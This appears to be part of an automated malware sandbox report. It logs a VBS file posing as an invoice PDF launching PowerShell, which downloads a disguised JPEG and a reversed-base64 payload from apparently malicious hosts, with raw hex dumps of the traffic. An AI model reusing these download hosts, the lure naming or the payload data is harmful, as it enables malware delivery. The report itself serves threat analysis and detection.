2024-04-30 05:59:35 UTC	1369	IN	Data Raw: 6c 57 5f 34 2f a5 6d 8c cd d3 9f 6e 71 af 23 4f 2a 2a 19 ce e6 21 78 42 07 e7 8a 6a fc 36 18 23 94 09 98 95 e9 cf 5c 04 9d 56 48 91 90 b1 a5 a2 3f ae 5c b2 4a ea cb 1a 92 00 5a 51 db df 2f a3 d8 a4 ab 10 23 22 c9 ee 49 ed 97 45 58 dd bc b1 e9 e8 d6 3a 57 38 03 48 9b ce e1 c8 37 c5 71 58 cc 40 34 92 16 56 25 56 c1 39 29 13 cc cc c3 8d a6 f2 f2 b1 d8 52 36 05 82 d3 57 d3 00 0f 36 e7 24 a9 6d c4 d0 1c e0 52 17 2e c4 13 63 db 8e 31 85 d3 ee 89 5c 1d ac b6 4f be 2b 36 a9 a1 b5 04 97 ef 7d b0 08 b0 97 3d 79 5e a7 13 9d 97 7e e1 5b b2 3c d9 ca ef 2d 4a c6 b2 d3 45 12 51 56 bb 17 f5 c0 e8 b5 0c 7d 3b aa ba 1f 7c 31 d4 c8 06 ed a4 af 7a c4 95 77 72 38 af 86 30 db cb 14 2f 60 76 18 04 49 3c c5 52 b4 08 fc 40 fc f1 89 1b 69 da 2a ab af c7 12 89 1d 24 21 40 03 83 ce Data Ascii: lW_4/mnq#O*!xBj6#\VH?\JZQ/#"IEX:W8H7qX@4V%V9)R6W6$mR.c1\O+6}=y^~[<-JEQV};\|1zwr80/`vI<R@i$!@
2024-04-30 05:59:35 UTC	1369	IN	Data Raw: f9 ce 8b 40 74 f1 23 89 4b 32 c8 64 7d de db 48 a3 f1 04 93 7e d8 8e af c5 f5 07 57 12 0d 39 d3 a6 e0 c4 b2 db 15 27 36 1e 09 5e 16 48 e4 65 0c 49 0d 60 70 47 b0 1d 7e a3 01 49 74 6b a9 8d 4e e2 50 a2 b6 d5 e4 1e 49 35 5c 59 f7 c6 84 70 a0 0c 23 0a 15 78 25 79 03 db 32 f4 11 eb 24 f1 a6 3a a9 e9 51 2f 62 31 0a 18 dd 0a ee 48 e4 e6 bc 8a ea db 55 0c 9c 85 36 68 55 e0 7c f3 ed 4a be 9b c4 d0 47 34 a5 5d 43 72 6a ba f1 9c 9a 8d 34 fa 38 fc e5 32 35 ed 0a 41 e0 9b 3d 47 3d b1 df b4 70 a6 a3 c7 e1 47 00 2f 93 7c 76 00 1e f9 e7 0a 9d 3e a4 84 2a c5 4d ab 29 b1 f0 fd 70 1c d6 68 d7 4a c1 96 65 65 6e 42 f3 78 a1 7d c7 36 f4 fe 1b 36 ae 17 d4 4f ea 91 d7 d0 a5 bf 13 76 24 df 18 b6 ab 45 14 5a 58 5c 3a ac db 03 32 96 14 dd 41 20 fc 0e 06 68 bb eb 43 0d 04 07 53 a8 Data Ascii: @t#K2d}H~W9'6^HeI`pG~ItkNPI5\Yp#x%y2$:Q/b1HU6hU\|JG4]Crj4825A=G=pG/\|v>*M)phJeenBx}66Ov$EZX\:2A hCS

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49709	104.21.45.138	443	7664	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-30 05:59:37 UTC	100	OUT	GET /images/004/773/797/original/new_image.jpg?1713882029 HTTP/1.1 Host: uploaddeimagens.com.br
2024-04-30 05:59:37 UTC	697	IN	HTTP/1.1 200 OK Date: Tue, 30 Apr 2024 05:59:37 GMT Content-Type: image/jpeg Content-Length: 4198361 Connection: close Last-Modified: Tue, 23 Apr 2024 14:20:29 GMT ETag: "6627c3ad-400fd9" Cache-Control: max-age=2678400 CF-Cache-Status: HIT Age: 6980 Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Hla8a%2F0Sv3IElEDyQ19iGTwrLsulCV%2BhNwgbDeTdXvfYBP7BMtfGAcqVJz%2B2AR9oJJDKuCAJockOtuQbI0D9xbpoSCNUw4hyWHh9uIWKt28UFM4Q65KQbNzLrYz%2B7K4nLsrepd6XRfJJ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87c54e8b8e1ce257-ORD alt-svc: h3=":443"; ma=86400
2024-04-30 05:59:37 UTC	672	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1 Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
2024-04-30 05:59:37 UTC	1369	IN	Data Raw: d4 6f e1 95 2e 54 7a 99 be b9 63 d3 ad 1c a9 63 d2 be b8 15 dc 4a 9b b5 f6 ac 1a 1d a4 90 41 f9 f5 cb 17 56 b0 39 f7 ca 11 67 70 34 3b e0 19 9c 70 c7 be 09 9c 37 21 fa 76 ca b3 a0 53 7e 9c 42 5d 62 23 10 87 76 03 6f 2e c3 b8 da df b6 25 36 bf 69 21 3f 35 c4 e6 d4 3c b6 49 a1 82 02 c7 4f ae 05 84 f2 4b 7e 6b b6 df 6c b3 6d d8 28 82 3d bb e5 42 9a ce a7 1c 91 81 c0 2a b0 a5 a3 84 2c 78 be bd b0 04 d9 e9 47 df 08 1e a8 55 9c 0b 96 35 c9 a1 92 08 f7 bf 86 50 9d c0 ae de bc 61 b4 da 79 27 72 91 45 b9 c2 ee da 18 02 c0 72 76 8e fc 5e 01 75 1a 59 74 e1 37 15 2a e0 30 75 e4 72 a0 d7 cf 9c 09 24 55 fe 78 f4 b2 09 9b ee cc 41 2d 0c 4f 19 ed b8 46 b6 39 f7 16 3e 75 99 c5 82 c6 49 5e 4f 1f 5e ff 00 96 05 67 d4 79 34 41 b2 d9 9a ee ce e5 9b 92 70 9b 99 a5 de dc d9 e7 Data Ascii: o.TzccJAV9gp4;p7!vS~B]b#vo.%6i!?5<IOK~klm(=B,xGU5Pay'rErv^uYt70ur$UxA-OF9>uI^O^gy4Ap
2024-04-30 05:59:37 UTC	1369	IN	Data Raw: 48 d9 87 25 56 1e 41 ae 79 bf e9 81 0d e2 32 08 62 56 d4 c8 4a 93 bb 69 0a d5 db af e5 8d cb e2 41 e1 60 81 c1 b0 4b 3d 5f e4 3a e6 02 10 5f 8e a3 9e 98 fc 65 44 44 96 dc 6f f2 c0 d9 8b 58 da 88 99 c3 b2 81 01 02 8d 5b 7b e6 47 8a 4a 1a 18 d1 9e 47 7d c4 ee 77 0d fc ba 61 0b 95 87 ad 02 38 cc bf 25 9f 73 03 64 1b ac 0e 0a 5b 4a 38 24 86 e0 63 4c e9 0c 70 5c 60 8b 36 0f cc 64 96 29 a7 24 a9 e9 db 04 b1 2c ba 65 63 a8 00 29 e4 1e d8 02 dc fe 71 28 36 96 3e 9e 68 01 7c 65 b5 29 32 1b 96 cb 29 da 5b 75 f3 d7 0f f7 64 91 77 19 d5 52 bd 3c 65 9a 04 3a 32 ad 39 dc be aa 2b d7 e5 80 9c 9a 93 2c 41 4f 51 96 d3 ea a5 88 6c 41 b9 79 b5 f7 c5 c0 06 ef 8e 31 dd 14 48 ee a0 3d 12 68 9c 06 fc 3f 4b 2e a7 54 b2 4d 4b 08 e4 82 78 61 ed 9b f3 6a 67 99 d7 c3 b4 11 24 6a 08 Data Ascii: H%VAy2bVJiA`K=_:_eDDoX[{GJG}wa8%sd[J8$cLp\`6d)$,ec)q(6>h\|e)2)[udwR<e:29+,AOQlAy1H=h?K.TMKxajg$j
2024-04-30 05:59:37 UTC	1369	IN	Data Raw: 6d c4 1f 54 e1 fc c6 72 37 71 4c 7a fc b1 32 69 85 9d cc 4f 37 99 5a ed 73 b7 89 69 f4 b6 41 17 25 1f 6e 47 18 1b 52 eb 3f 7b cf 4f 7c 13 6a 06 e0 43 7d 31 39 81 65 b0 7b e5 51 59 85 12 70 1b 1a b2 58 9b af 86 10 6a 83 70 c4 13 ef ed 88 ec 2c c7 a8 ac a9 47 57 ba 24 55 f1 81 a3 bd 9d 96 98 71 dc e5 5e 42 a5 bd 56 40 bf 86 2e 8c 01 50 7b e4 3b 30 6b 09 60 f0 6f a5 60 59 f5 4d d0 1b e2 f1 49 b5 74 a7 77 43 c5 e1 24 65 0a d4 45 8e c3 12 d8 b3 ab 2b 30 e3 9c 00 78 66 bb 4a 8d 2e 9f 4e 79 57 2c d6 73 45 75 8a 1b 69 60 2f a6 65 68 fc 3f 4f 0e b6 51 18 51 23 f2 79 ea 31 8d 58 8f 4f 0b 4f 35 05 41 ba fa 60 31 e2 1e 2d 16 82 07 9a 57 00 28 a0 3d ce 2b a3 f1 45 d4 e9 44 e2 c6 ee 68 e7 8b 79 e6 fb 53 e2 bb 01 2b a5 8b d4 07 be 7a b8 95 60 d3 ac 61 00 0a 28 01 df 00 Data Ascii: mTr7qLz2iO7ZsiA%nGR?{O\|jC}19e{QYpXjp,GW$Uq^BV@.P{;0k`o`YMItwC$eE+0xfJ.NyW,sEui`/eh?OQQ#y1XOO5A`1-W(=+EDhyS+z`a(
2024-04-30 05:59:37 UTC	1369	IN	Data Raw: f8 03 32 f9 ca c8 48 50 a3 af 73 92 1d 11 95 63 62 c2 b9 b1 9d 2e 98 46 14 06 1e af a8 c1 24 65 25 00 b0 2a 7a 9f 86 06 ae 85 92 2a 49 4d b1 4a a0 2e af 17 d5 44 04 a0 d9 00 37 e1 be b8 7d 23 23 48 18 20 6d b6 07 6c 36 a5 d2 66 08 83 6d 0b 22 ba e0 05 bc 37 4c f1 79 82 46 16 bb af ad fc 30 6a 9a 78 d6 b7 a0 20 d9 2b b8 11 fa 63 62 24 8d 89 67 01 54 32 ed 63 d2 86 2a 1f ef 0e 5e 38 d5 54 75 bf 6a c0 e8 60 f3 a2 a9 67 37 cf 1e a3 c5 fc b1 89 42 29 28 a3 70 07 6a 8f 80 1d 71 35 99 8a b1 0d b5 57 a0 3d b2 1f 56 1a 7a 2d 7e a2 45 8a c0 d0 1a 84 45 54 44 ed db be 66 4f a8 42 ce 80 35 6e ba ba e7 1a 56 de f6 a0 0f f1 57 7c 52 6d 1c 92 cc 5c 11 4c d4 49 ed 80 54 9d 95 55 54 b1 04 56 ef 6c 87 44 23 76 d6 af e2 20 61 e2 54 40 a9 76 40 ab f7 ce 62 e2 e8 a9 5e 84 1c Data Ascii: 2HPscb.F$e%zIMJ.D7}##H ml6fm"7LyF0jx +cb$gT2c*^8Tuj`g7B)(pjq5W=Vz-~EETDfOB5nVW\|Rm\LITUTVlD#v aT@v@b^
2024-04-30 05:59:37 UTC	1369	IN	Data Raw: 1e 1a 3c a4 52 cc a5 76 d0 0c 4f 4b 61 78 1e 78 15 7e ab 7f 0c 63 4e 88 d2 84 31 17 b1 e9 50 c5 6b ea 30 22 c0 e2 f7 77 1d 86 71 90 af 73 7f 0c 0d 43 a1 a5 e3 4c a6 bb 89 5b 8f 9f a7 2a fa 22 bb 6f 4c b4 4d 7a 64 6a fa f1 8a c1 ac 9c cf 12 99 a6 71 b8 0d aa c6 cf 3d 33 d1 ce ea fa 56 31 a2 db 10 9c 80 6f ad 8a 3d aa ef 9c 0c 73 a0 43 75 a6 5a 06 8d cc c3 fa 67 2e 89 28 56 91 48 3d 0f 9a 48 fc eb 3d 01 82 3f 3b 72 a4 61 aa ba 00 55 7d 85 0e 9f 5c 21 86 c0 b0 a4 7b 0c 0f 3c 34 4a c7 8d 3a 90 3f fb 69 e3 ff 00 0e 17 4f e0 b3 4f 32 bc 5a 55 5e 6c 39 9d 97 69 1d 0f e1 eb 79 b8 23 8d 48 a2 01 ec 08 b1 92 0c 85 c9 f3 4d 8f 73 55 80 ac fe 0b 0e b3 c4 97 59 1c ac b2 ab 2b 48 cc cb 6a 55 46 d2 ab 55 46 8d df 4f 8f 4c c7 d4 e8 9b 4f 3e a4 69 b4 10 88 a1 6d c1 e6 9b Data Ascii: <RvOKaxx~cN1Pk0"wqsCL[*"oLMzdjq=3V1o=sCuZg.(VH=H=?;raU}\!{<4J:?iOO2ZU^l9iy#HMsUY+HjUFUFOLO>im
2024-04-30 05:59:37 UTC	1369	IN	Data Raw: 06 01 54 90 2e fa 66 7b a3 f9 62 40 a4 5d 7e 2e fc 60 2f 1a a2 3f 24 93 54 4f 61 8e 2d 4a 9b 56 e9 7a d6 26 59 88 36 aa 2b db 0b 1f 99 15 6d e7 70 bc 03 c9 28 8d 76 ef 00 f4 e7 28 60 0a 81 81 52 b4 4f 18 35 2c 75 54 e8 38 e8 48 be d8 e8 53 3c 2c a3 69 da 3a 03 47 f2 c0 41 b6 ae 98 28 71 ea e0 93 db 20 c6 87 4c 44 64 b1 2d 74 3e 58 ab 02 ac 45 11 cf 7c 6b 46 76 ab 10 81 be 78 14 92 09 56 15 77 71 b7 b0 38 c4 53 9d 52 ac 12 c4 0a a8 fc 43 a8 c0 49 1c f3 7a c2 96 5f 61 db 02 92 3c 36 14 95 f7 b1 80 6d 62 69 90 a8 81 f7 7f 88 9c 8d 14 eb a7 9c 3b 0b 5e f8 23 0b ed 57 23 86 e9 83 e4 58 c0 f4 4f af 86 d9 1b a1 1b 94 fb 9c 04 3e 27 3c 5a 95 96 34 2c 3f 0f 1e f9 89 cd 8b c7 a1 98 a4 41 4a 85 fe 21 7d f0 0f ad f1 4d 6b 6b 19 98 b2 1b e1 7d b1 87 d3 cd a9 d3 2c f6 Data Ascii: T.f{b@]~.`/?$TOa-JVz&Y6+mp(v(`RO5,uT8HS<,i:GA(q LDd-t>XE\|kFvxVwq8SRCIz_a<6mbi;^#W#XO>'<Z4,?AJ!}Mkk},
2024-04-30 05:59:37 UTC	1369	IN	Data Raw: db 1d 13 85 1f 76 75 23 8f 4d 56 78 a0 db 5c 89 23 5d bd be 18 60 c1 e2 dc 63 5a 51 55 ef 81 e8 13 ed 54 52 b8 67 d3 35 06 21 42 f7 c7 f5 3f 6b f4 b0 e9 83 36 96 50 38 1c 1a 39 e4 21 7b e1 23 51 ec 79 eb 87 62 25 fd dc 88 ac 3b f2 70 37 0f da d8 1e 20 cb a5 9a 8f bb 62 69 f6 af 4b bd 80 d2 4a 0d f3 6d 99 4e a1 18 aa 00 54 76 ba c5 66 01 19 58 46 a0 9e 4d 1b c0 f4 9f fc 4d a0 59 96 63 a2 70 ed c7 5e 71 6d 5f da 5d 16 bb 4c d0 49 a3 93 67 00 8b eb 9e 73 57 aa 68 d3 7e d0 c7 b7 c3 07 0e a5 a7 87 70 00 71 c8 1e f8 1a de 1f e2 fa 0f 09 59 57 4d a1 98 96 3c 96 ec 31 98 be d6 69 8b 94 3a 47 51 d4 1b eb 98 7a 67 79 94 a1 b0 41 ac 60 e9 d5 c8 26 35 b5 e3 9e 30 35 9b ed 4c 09 3b 37 91 20 42 bd 3e 39 57 fb 53 a7 53 ea d3 48 54 fc 73 38 e9 8b 72 d1 aa a8 e3 ae 53 53 Data Ascii: vu#MVx\#]`cZQUTRg5!B?k6P89!{#Qyb%;p7 biKJmNTvfXFMMYcp^qm_]LIgsWh~pqYWM<1i:GQzgyA`&505L;7 B>9WSSHTs8rSS
2024-04-30 05:59:37 UTC	1369	IN	Data Raw: 5f 34 2f a5 6d 8c cd d3 9f 6e 71 af 23 4f 2a 2a 19 ce e6 21 78 42 07 e7 8a 6a fc 36 18 23 94 09 98 95 e9 cf 5c 04 9d 56 48 91 90 b1 a5 a2 3f ae 5c b2 4a ea cb 1a 92 00 5a 51 db df 2f a3 d8 a4 ab 10 23 22 c9 ee 49 ed 97 45 58 dd bc b1 e9 e8 d6 3a 57 38 03 48 9b ce e1 c8 37 c5 71 58 cc 40 34 92 16 56 25 56 c1 39 29 13 cc cc c3 8d a6 f2 f2 b1 d8 52 36 05 82 d3 57 d3 00 0f 36 e7 24 a9 6d c4 d0 1c e0 52 17 2e c4 13 63 db 8e 31 85 d3 ee 89 5c 1d ac b6 4f be 2b 36 a9 a1 b5 04 97 ef 7d b0 08 b0 97 3d 79 5e a7 13 9d 97 7e e1 5b b2 3c d9 ca ef 2d 4a c6 b2 d3 45 12 51 56 bb 17 f5 c0 e8 b5 0c 7d 3b aa ba 1f 7c 31 d4 c8 06 ed a4 af 7a c4 95 77 72 38 af 86 30 db cb 14 2f 60 76 18 04 49 3c c5 52 b4 08 fc 40 fc f1 89 1b 69 da 2a ab af c7 12 89 1d 24 21 40 03 83 ce 16 42 Data Ascii: _4/mnq#O*!xBj6#\VH?\JZQ/#"IEX:W8H7qX@4V%V9)R6W6$mR.c1\O+6}=y^~[<-JEQV};\|1zwr80/`vI<R@i$!@B
2024-04-30 05:59:37 UTC	1369	IN	Data Raw: 8b 40 74 f1 23 89 4b 32 c8 64 7d de db 48 a3 f1 04 93 7e d8 8e af c5 f5 07 57 12 0d 39 d3 a6 e0 c4 b2 db 15 27 36 1e 09 5e 16 48 e4 65 0c 49 0d 60 70 47 b0 1d 7e a3 01 49 74 6b a9 8d 4e e2 50 a2 b6 d5 e4 1e 49 35 5c 59 f7 c6 84 70 a0 0c 23 0a 15 78 25 79 03 db 32 f4 11 eb 24 f1 a6 3a a9 e9 51 2f 62 31 0a 18 dd 0a ee 48 e4 e6 bc 8a ea db 55 0c 9c 85 36 68 55 e0 7c f3 ed 4a be 9b c4 d0 47 34 a5 5d 43 72 6a ba f1 9c 9a 8d 34 fa 38 fc e5 32 35 ed 0a 41 e0 9b 3d 47 3d b1 df b4 70 a6 a3 c7 e1 47 00 2f 93 7c 76 00 1e f9 e7 0a 9d 3e a4 84 2a c5 4d ab 29 b1 f0 fd 70 1c d6 68 d7 4a c1 96 65 65 6e 42 f3 78 a1 7d c7 36 f4 fe 1b 36 ae 17 d4 4f ea 91 d7 d0 a5 bf 13 76 24 df 18 b6 ab 45 14 5a 58 5c 3a ac db 03 32 96 14 dd 41 20 fc 0e 06 68 bb eb 43 0d 04 07 53 a8 8e 21 Data Ascii: @t#K2d}H~W9'6^HeI`pG~ItkNPI5\Yp#x%y2$:Q/b1HU6hU\|JG4]Crj4825A=G=pG/\|v>*M)phJeenBx}66Ov$EZX\:2A hCS!

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	49710	66.90.95.11	443	7664	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-30 05:59:48 UTC	73	OUT	GET /ghj.txt HTTP/1.1 Host: bomdokasw.ru.com Connection: Keep-Alive
2024-04-30 05:59:49 UTC	208	IN	HTTP/1.1 200 OK Date: Tue, 30 Apr 2024 05:59:49 GMT Server: Apache Last-Modified: Mon, 29 Apr 2024 13:03:08 GMT Accept-Ranges: bytes Content-Length: 44376 Connection: close Content-Type: text/plain
2024-04-30 05:59:49 UTC	7984	IN	Data Raw: 3d 3d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: ==AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-04-30 05:59:49 UTC	8000	IN	Data Raw: 41 67 47 41 7a 42 67 63 41 55 47 41 33 42 77 62 41 41 58 48 41 41 51 4d 41 4d 48 41 77 42 67 4c 4a 41 41 41 55 42 51 52 41 63 30 42 41 41 51 58 44 41 41 41 62 42 41 49 41 34 47 41 6c 42 41 63 41 38 55 44 41 41 67 63 41 55 47 41 33 42 77 62 41 77 45 41 76 42 41 56 50 41 41 41 6e 42 77 63 41 30 30 42 41 41 41 49 41 45 43 41 79 42 77 62 41 49 48 41 79 42 51 52 41 41 43 41 75 42 51 61 41 63 47 41 31 42 41 62 41 41 56 48 41 41 77 51 41 55 45 41 45 64 41 41 41 4d 45 41 4f 42 51 52 48 41 41 41 6a 42 67 62 41 55 48 41 47 42 77 51 41 45 45 41 56 39 41 41 41 34 47 41 31 42 67 55 41 6f 47 41 75 42 51 61 4e 41 41 41 7a 42 67 62 41 38 47 41 70 42 41 64 41 41 48 41 50 42 67 62 41 55 48 41 53 56 42 41 41 6b 48 41 79 42 51 5a 41 59 48 41 76 42 77 59 41 55 47 41 53 46 42 Data Ascii: AgGAzBgcAUGA3BwbAAXHAAQMAMHAwBgLJAAAUBQRAc0BAAQXDAAAbBAIA4GAlBAcA8UDAAgcAUGA3BwbAwEAvBAVPAAAnBwcA00BAAAIAECAyBwbAIHAyBQRAACAuBQaAcGA1BAbAAVHAAwQAUEAEdAAAMEAOBQRHAAAjBgbAUHAGBwQAEEAV9AAA4GA1BgUAoGAuBQaNAAAzBgbA8GApBAdAAHAPBgbAUHASVBAAkHAyBQZAYHAvBwYAUGASFB
2024-04-30 05:59:49 UTC	8000	IN	Data Raw: 75 6c 45 41 30 78 57 64 7a 56 6d 55 6a 35 57 65 7a 46 55 5a 30 46 32 5a 6c 78 57 5a 45 42 51 5a 72 39 6d 64 75 6c 45 5a 75 56 45 41 6c 52 58 59 30 4e 31 59 75 6c 33 63 42 56 47 64 68 64 57 5a 73 56 47 52 41 73 32 59 68 4a 47 62 73 46 32 51 6c 52 58 59 6e 56 47 62 6c 52 45 41 6c 74 32 62 32 35 57 53 75 6c 32 5a 6c 4a 45 41 72 4e 57 59 69 78 47 62 68 4e 30 59 75 6c 33 63 42 42 41 5a 76 68 47 64 6c 31 45 64 6c 64 6d 63 68 52 46 41 30 4e 57 5a 71 4a 32 54 30 56 32 5a 79 46 47 56 41 55 47 64 68 64 57 5a 73 56 47 52 30 4e 58 59 6a 6c 47 64 73 56 58 54 41 41 7a 58 6c 52 58 59 6e 56 47 62 6c 52 30 63 31 39 57 62 35 35 32 62 75 46 45 4a 43 5a 46 41 6c 52 58 64 69 6c 6d 63 30 52 58 51 6b 56 47 64 68 4a 58 5a 75 56 32 52 79 56 47 62 70 42 58 62 76 4e 45 41 6c 52 58 Data Ascii: ulEA0xWdzVmUj5WezFUZ0F2ZlxWZEBQZr9mdulEZuVEAlRXY0N1Yul3cBVGdhdWZsVGRAs2YhJGbsF2QlRXYnVGblREAlt2b25WSul2ZlJEArNWYixGbhN0Yul3cBBAZvhGdl1EdldmchRFA0NWZqJ2T0V2ZyFGVAUGdhdWZsVGR0NXYjlGdsVXTAAzXlRXYnVGblR0c19Wb552buFEJCZFAlRXdilmc0RXQkVGdhJXZuV2RyVGbpBXbvNEAlRX
2024-04-30 05:59:49 UTC	8000	IN	Data Raw: 41 59 42 41 41 41 41 41 48 78 4d 41 75 45 77 63 47 51 41 41 57 41 41 41 41 41 77 52 51 42 51 4c 42 67 57 42 59 44 69 46 41 41 49 41 41 41 41 41 41 77 53 41 6a 56 51 77 41 59 42 41 41 41 41 41 47 78 50 41 72 45 51 4a 46 38 49 41 57 41 41 41 41 41 67 52 63 44 67 4b 42 41 53 42 75 42 69 46 41 41 49 41 41 41 41 41 41 6f 43 41 58 45 41 56 59 45 42 41 41 41 41 41 47 68 46 41 70 41 41 76 46 55 46 41 57 41 41 41 41 41 51 52 4d 44 51 4b 41 4d 52 41 5a 67 68 42 41 41 41 41 41 55 45 78 41 59 53 41 59 55 41 52 41 59 42 41 41 41 41 41 45 78 45 41 6d 41 77 45 42 6b 42 47 47 41 41 41 41 41 41 52 45 42 51 4a 41 6f 4e 45 6f 67 51 45 41 41 41 41 41 4d 45 5a 41 51 43 41 61 44 42 48 49 45 42 41 41 41 41 41 44 52 46 41 6a 45 67 45 46 59 44 41 52 41 41 41 41 41 67 51 59 44 51 Data Ascii: AYBAAAAAHxMAuEwcGQAAWAAAAAwRQBQLBgWBYDiFAAIAAAAAAwSAjVQwAYBAAAAAGxPArEQJF8IAWAAAAAgRcDgKBASBuBiFAAIAAAAAAoCAXEAVYEBAAAAAGhFApAAvFUFAWAAAAAQRMDQKAMRAZghBAAAAAUExAYSAYUARAYBAAAAAExEAmAwEBkBGGAAAAAAREBQJAoNEogQEAAAAAMEZAQCAaDBHIEBAAAAADRFAjEgEFYDARAAAAAgQYDQ
2024-04-30 05:59:49 UTC	8000	IN	Data Raw: 73 6f 41 41 41 6b 38 62 77 42 77 42 52 4a 6e 43 41 41 51 76 76 4a 67 43 41 41 77 48 6f 41 41 41 42 51 50 49 4b 41 41 41 49 6a 79 41 4b 41 41 41 67 67 69 42 4b 6f 41 41 41 67 49 4b 4b 41 41 41 43 68 69 41 47 41 41 41 43 68 43 48 4b 41 41 41 48 69 53 45 41 41 51 4a 41 41 41 41 49 44 51 43 77 4d 52 41 41 41 41 4a 4f 41 41 4c 73 41 41 41 41 41 41 41 41 41 52 41 71 59 41 41 72 6f 67 46 41 34 74 43 41 41 77 49 6f 30 67 43 41 41 51 49 6f 55 69 44 65 6a 64 4d 61 63 77 43 57 66 78 42 63 34 74 43 58 51 41 4c 47 41 41 41 31 67 43 5a 66 49 67 45 6b 39 42 42 53 51 77 45 4b 41 41 41 48 6a 43 5a 66 55 37 42 4d 51 78 43 57 45 42 41 41 51 43 41 41 41 41 51 41 55 41 4d 62 41 41 41 41 41 67 43 41 49 6f 41 41 41 49 41 43 45 41 41 41 51 43 44 41 49 43 48 41 59 41 41 41 41 41 Data Ascii: soAAAk8bwBwBRJnCAAQvvJgCAAwHoAAABQPIKAAAIjyAKAAAggiBKoAAAgIKKAAAChiAGAAAChCHKAAAHiSEAAQJAAAAIDQCwMRAAAAJOAALsAAAAAAAAARAqYAArogFA4tCAAwIo0gCAAQIoUiDejdMacwCWfxBc4tCXQALGAAA1gCZfIgEk9BBSQwEKAAAHjCZfU7BMQxCWEBAAQCAAAAQAUAMbAAAAAgCAIoAAAIACEAAAQCDAICHAYAAAAA
2024-04-30 05:59:49 UTC	4392	IN	Data Raw: 41 4d 43 4b 4b 41 48 41 42 4d 74 63 4d 6f 41 41 41 45 43 4b 6c 73 68 33 64 34 74 43 4b 41 41 41 56 38 6d 43 41 41 51 56 76 42 48 41 43 30 72 63 48 41 6a 33 4b 6f 41 41 41 38 7a 62 77 42 77 41 50 49 48 63 41 4d 77 49 79 70 41 41 41 38 7a 62 77 42 77 41 50 49 48 63 41 4d 51 45 79 70 41 41 41 38 7a 62 77 42 77 41 50 49 48 63 41 4d 77 42 79 70 41 41 41 55 78 62 4b 41 41 41 56 39 47 63 41 49 51 76 79 64 67 43 41 41 67 59 76 64 77 43 4b 41 41 41 68 4e 48 63 41 49 77 78 79 46 42 41 41 55 42 41 41 41 77 67 41 4d 41 4d 62 45 41 41 41 51 53 47 41 51 48 64 41 41 41 41 41 41 41 41 41 41 41 44 41 49 6d 53 41 67 42 41 43 41 41 41 63 45 41 41 71 59 41 41 65 72 41 41 41 4d 43 4b 48 34 74 43 41 41 77 49 6f 6f 41 63 41 45 77 30 79 70 41 41 41 45 43 4b 5a 34 39 47 65 72 51 Data Ascii: AMCKKAHABMtcMoAAAECKlsh3d4tCKAAAV8mCAAQVvBHAC0rcHAj3KoAAA8zbwBwAPIHcAMwIypAAA8zbwBwAPIHcAMQEypAAA8zbwBwAPIHcAMwBypAAAUxbKAAAV9GcAIQvydgCAAgYvdwCKAAAhNHcAIwxyFBAAUBAAAwgAMAMbEAAAQSGAQHdAAAAAAAAAAADAImSAgBACAAAcEAAqYAAerAAAMCKH4tCAAwIooAcAEw0ypAAAECKZ49GerQ

Target ID:	0
Start time:	07:59:09
Start date:	30/04/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Factura.PDF______________________________________.vbs"
Imagebase:	0x7ff6c3850000
File size:	170'496 bytes
